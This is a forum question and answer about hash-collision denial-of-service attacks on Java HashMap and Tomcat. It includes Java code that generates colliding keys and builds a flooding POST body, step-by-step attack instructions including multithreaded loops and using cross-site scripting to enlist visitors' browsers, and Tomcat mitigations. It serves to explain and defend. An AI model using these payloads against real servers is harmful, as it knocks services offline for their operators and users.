Application vulnerability due to Non Random Hash Functions

Sumit · Dec 29, 2011

The excerpt below is from an article that explains the possibility of a Denial of Service (DoS) attack based on the non-random hash functions used in hash data structures.

[…] the condition can be leveraged by exploiting predictable collisions in the underlying hashing algorithms.

To verify this, I went through Oracle's reference implementation of Java's HashMap and indeed found a static hash function in use. Note that this supplemental hash only scrambles the bits of the key's hashCode() deterministically, so keys with equal hashCodes still land in the same bucket:

    // From JDK 6's HashMap: a supplemental hash applied on top of key.hashCode().
    // It is a fixed, deterministic bit-mixing function - no randomness involved.
    static int hash(int h) {
        h ^= (h >>> 20) ^ (h >>> 12);
        return h ^ (h >>> 7) ^ (h >>> 4);
    }

Another paper on the topic states:

A Tomcat 6.0.32 server parses a 2 MB string of colliding keys in about 44 minutes of i7 CPU time, so an attacker with about 6 kbit/s can keep one i7 core constantly busy. If the attacker has a Gigabit connection, he can keep about 100,000 i7 cores busy.

How can we safeguard against this vulnerability? This is all the more pressing given that so much of the software we use (Tomcat, etc.) is open source and relies on this implementation.

Answer

Sripathi Krishnan · Dec 29, 2011

Understanding the Attack Vector

How HashMaps work

Say a comment form on a blog accepts the parameters first_name, last_name, and comment as POST parameters. Internally, Tomcat stores these parameters in a HashMap.

The logical structure of this HashMap is like this -


"first_name" --> "Sripathi"
"last_name" --> "Krishnan"
"comment" ---> "DoS using poor Hashes"

But the physical structure is different. The keys are first converted into a hashCode, and then the hashCode is converted into an array index.

The ideal physical structure thus becomes -


0 --> "Sripathi"
1 --> "Krishnan"
2 --> "DoS using poor Hashes"

But the possible keys are infinite, so at some point two keys will have the same hash code. This is a hash collision.

With collisions, the physical structure becomes:


0 --> "Sripathi", "Krishnan"
1 --> Empty
2 --> "DoS using poor hashes"

Hash Collisions and impact on performance

When hash collisions occur, inserting a new entry means sequentially iterating over all the elements in a single hash "bucket" just to find out whether the key already exists in the map. Inserting one element approaches O(n) complexity if all elements hash to the same value, so inserting n elements in this worst case costs O(n²).

In short: if you insert thousands of keys that have the same hashCode, the server will require a lot of CPU cycles.
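
A rough benchmark sketch to feel this cost (the BadKey class is made up for illustration). On the Java 6/7 maps discussed here the slowdown is quadratic; note that Java 8+ converts large buckets into balanced trees, which blunts this particular worst case:

    import java.util.HashMap;
    import java.util.Map;

    public class CollisionCost {
        // Every BadKey has the same hashCode, so all entries land in one bucket.
        static final class BadKey {
            final int id;
            BadKey(int id) { this.id = id; }
            @Override public int hashCode() { return 42; }  // constant -> guaranteed collisions
            @Override public boolean equals(Object o) {
                return o instanceof BadKey && ((BadKey) o).id == id;
            }
        }

        public static void main(String[] args) {
            for (int n = 1000; n <= 32000; n *= 2) {
                Map<BadKey, Integer> map = new HashMap<BadKey, Integer>();
                long start = System.nanoTime();
                for (int i = 0; i < n; i++) {
                    map.put(new BadKey(i), i);    // each put walks the whole bucket
                }
                long ms = (System.nanoTime() - start) / 1000000;
                System.out.println(n + " colliding inserts: " + ms + " ms");
            }
        }
    }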

How do you generate keys with the same Hash?

In Java, "Aa" and "BB" have the same hash code.

Because of a property called "Equivalent Substrings", we can generate many other strings with the same hash code just by starting with these two strings.

First Iteration : "AAAA", "AABb", "BbAA", "BbBb" have the same hash code

Now we have 4 strings with the same hash code. We can combine them pairwise (concatenating any one with any other) to generate 16 strings that also share a hash code. For example:


"AaAaAaAa", "AaAaBBBB", "AaAaAaBB", "AaAaBBAa",
"BBBBAaAa", "BBBBBBBB", "BBBBAaBB", "BBBBBBAa",
"AaBBAaAa", "AaBBBBBB", "AaBBAaBB", "AaBBBBAa",
"BBAaAaAa", "BBAaBBBB", "BBAaAaBB", "BBAaBBAa",

All these 16 strings have the same hash code.

You can now take these 16 strings and combine them to generate 256 strings that have the same hash code, and so on.

In short: it is very easy to generate a large set of strings that all have the exact same hash code.
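
A minimal generator sketch (the class name and block count are arbitrary): because the hash of a concatenation depends only on the hashes and lengths of its parts, every combination of "Aa"/"BB" blocks collides:

    import java.util.ArrayList;
    import java.util.List;

    public class CollisionGenerator {
        // Build all 2^blocks strings made of "Aa"/"BB" blocks;
        // every one of them has the same String.hashCode().
        static List<String> collidingKeys(int blocks) {
            List<String> keys = new ArrayList<String>();
            keys.add("");
            for (int i = 0; i < blocks; i++) {
                List<String> next = new ArrayList<String>(keys.size() * 2);
                for (String k : keys) {
                    next.add(k + "Aa");
                    next.add(k + "BB");
                }
                keys = next;
            }
            return keys;                           // 2^blocks colliding strings
        }

        public static void main(String[] args) {
            List<String> keys = collidingKeys(10); // 1024 colliding strings
            System.out.println(keys.size() + " keys, e.g. " + keys.get(0)
                    + ", all with hash " + keys.get(0).hashCode());
        }
    }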

How do you attack the server?

  1. Create thousands of strings that have the same hash code (see above)
  2. Construct a POST request with those strings as parameter names - AaAa=&AaBB=&BBAa=&BBBB= .... (a payload-building sketch follows this list)
  3. Submit the form
  4. Repeat in a loop, and create several threads so that all server resources are used up
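
For illustration, the POST body in step 2 is just the colliding keys joined as empty form fields. A sketch (it only builds the string, reusing collidingKeys() from the generator sketch above):

    import java.util.List;

    public class PayloadBuilder {
        // Sketch: join colliding keys into a form-encoded POST body, "AaAa=&AaBB=&..."
        // (empty values; only the parameter names matter to the hash table).
        static String buildPayload(List<String> keys) {
            StringBuilder body = new StringBuilder();
            for (String key : keys) {
                if (body.length() > 0) body.append('&');
                body.append(key).append('=');
            }
            return body.toString();
        }

        public static void main(String[] args) {
            String body = buildPayload(CollisionGenerator.collidingKeys(10));
            System.out.println(body.substring(0, 40) + "...");
        }
    }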

Because this is just a POST request, an attacker can even use innocent browsers to attack a server: find a website with a cross-site scripting vulnerability, embed code that makes the POST request, and then use social engineering to spread the link to as many users as possible.

Prevention

In general, the underlying platform cannot fix this; it is considered an application framework problem. In other words, Tomcat has to fix it, not Oracle/Sun.

Possible fixes include :

  1. Restrict the number of POST parameters - Tomcat 6.0.35+ has a new parameter, maxParameterCount. The default value is 10,000. The lower the better, as long as it does not break your functionality. (See the configuration sketch after this list.)

  2. Restrict the size of the POST request - For the attack to work, the payload has to be huge. The default POST size allowed by Tomcat is 2 MB. Reducing it to, say, 200 KB will reduce the effectiveness of this attack. The parameter in Tomcat is maxPostSize.

  3. Web Application Firewall - If you have a web application firewall, you can configure it to block requests that look suspicious. This is a reactive measure, but it is nice to have in case you cannot use one of the above solutions.
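
For example, both limits can be set on the HTTP connector in Tomcat's server.xml. A sketch only; the port, protocol, and exact values are placeholders to adapt to your setup:

    <!-- server.xml sketch: cap both the parameter count and the POST body size -->
    <Connector port="8080" protocol="HTTP/1.1"
               maxParameterCount="1000"
               maxPostSize="204800" />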

FYI - Tomcat's documentation is here - http://tomcat.apache.org/tomcat-6.0-doc/config/http.html